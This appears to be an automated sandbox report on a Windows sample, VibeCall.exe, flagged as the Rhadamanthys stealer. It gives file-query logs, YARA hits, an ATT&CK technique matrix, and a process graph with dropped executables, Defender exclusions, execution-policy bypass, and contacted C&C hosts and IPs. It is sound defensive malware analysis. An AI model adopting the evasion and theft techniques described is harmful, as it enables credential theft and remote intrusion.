                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Queries volume information: C:\ | VolumeInformation
                      Source: C:\Windows\SysWOW64\OpenWith.exe | Queries volume information: C:\ | VolumeInformation
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_3_01427C40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 15_3_01427C40
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 0000000F.00000003.2613199093.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000003.2622310523.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000003.2748731274.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002C.00000003.2762606436.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.2771328207.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002C.00000002.2850833313.00000000045B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2675380696.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000003.2660565832.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.2712038838.0000000003550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002C.00000003.2813182905.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.2761245461.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000003.2664105430.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2637203150.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Source: Yara match | File source: 0000000F.00000003.2613199093.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000003.2622310523.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000003.2748731274.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002C.00000003.2762606436.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.2771328207.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002C.00000002.2850833313.00000000045B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2675380696.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000003.2660565832.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.2712038838.0000000003550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002C.00000003.2813182905.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.2761245461.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000003.2664105430.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2637203150.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      MITRE ATT&CK Matrix (one line per tactic; the numeric prefixes shown before technique names are kept as they appear in the report)

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                      Execution: 141 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
                      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                      Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                      Defense Evasion: 111 Masquerading; 11 Disable or Modify Tools; 161 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
                      Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                      Discovery: 1 System Time Discovery; 251 Security Software Discovery; 1 Process Discovery; 161 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 144 System Information Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                      Collection: 21 Input Capture; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                      Command and Control: 1 Web Service; 11 Encrypted Channel; 11 Non-Standard Port; 11 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 124 Application Layer Protocol; Commonly Used Port
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1626653
Sample: VibeCall.exe
Startdate: 28/02/2025
Architecture: WINDOWS
Score: 84

Start
  DNS/IP: pastebin.com (signature: Connects to a pastebin service (likely for C&C)); rustaisolutionnorisk.com; 3 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Yara detected RHADAMANTHYS Stealer; 5 other signatures
  VibeCall.exe 17 (started)
    DNS/IP: ip-api.com 208.95.112.1 TUT-ASUS United States; 147.45.60.20 FREE-NET-ASFREEnetEU Russian Federation; 2 other IPs or domains
    Dropped: C:\Users\user\aisolution_vibecall_a.exe (PE32); C:\Users\...\videosolution_vibecall_b.exe (PE32); C:\Users\...\soundsolution_vibecall_c.exe (PE32); C:\Users\...\contry_solution_vibecall_e.exe (PE32)
    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Bypasses PowerShell execution policy; Drops PE files to the user root directory; Adds a directory exclusion to Windows Defender
    aisolution_vibecall_a.exe 1 (started)
      Signatures: Switches to a custom stack to bypass stack traces
      fontdrvhost.exe (started)
        DNS/IP: 171.22.120.233 DEDIPATH-LLCUS Latvia
        Signatures: Switches to a custom stack to bypass stack traces
        fontdrvhost.exe (started)
          WerFault.exe (started)
      2 other processes
    soundsolution_vibecall_c.exe 1 (started)
      OpenWith.exe (started)
        DNS/IP: 98.142.253.232 VELCOMCA Canada
      WerFault.exe (started)
    contry_solution_vibecall_e.exe (started)
      fontdrvhost.exe (started)
        DNS/IP: api.help-asus.com 79.141.162.188 HZ-US-ASBG Bulgaria; cloudflare-dns.com 104.16.248.249 CLOUDFLARENETUS United States
        fontdrvhost.exe (started)
      2 other processes
    4 other processes
      DNS/IP: pastebin.com 104.20.4.235, 443, 49739 CLOUDFLARENETUS United States
      Signatures: Loading BitLocker PowerShell Module
      conhost.exe (started)
      conhost.exe (started)
      2 other processes

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.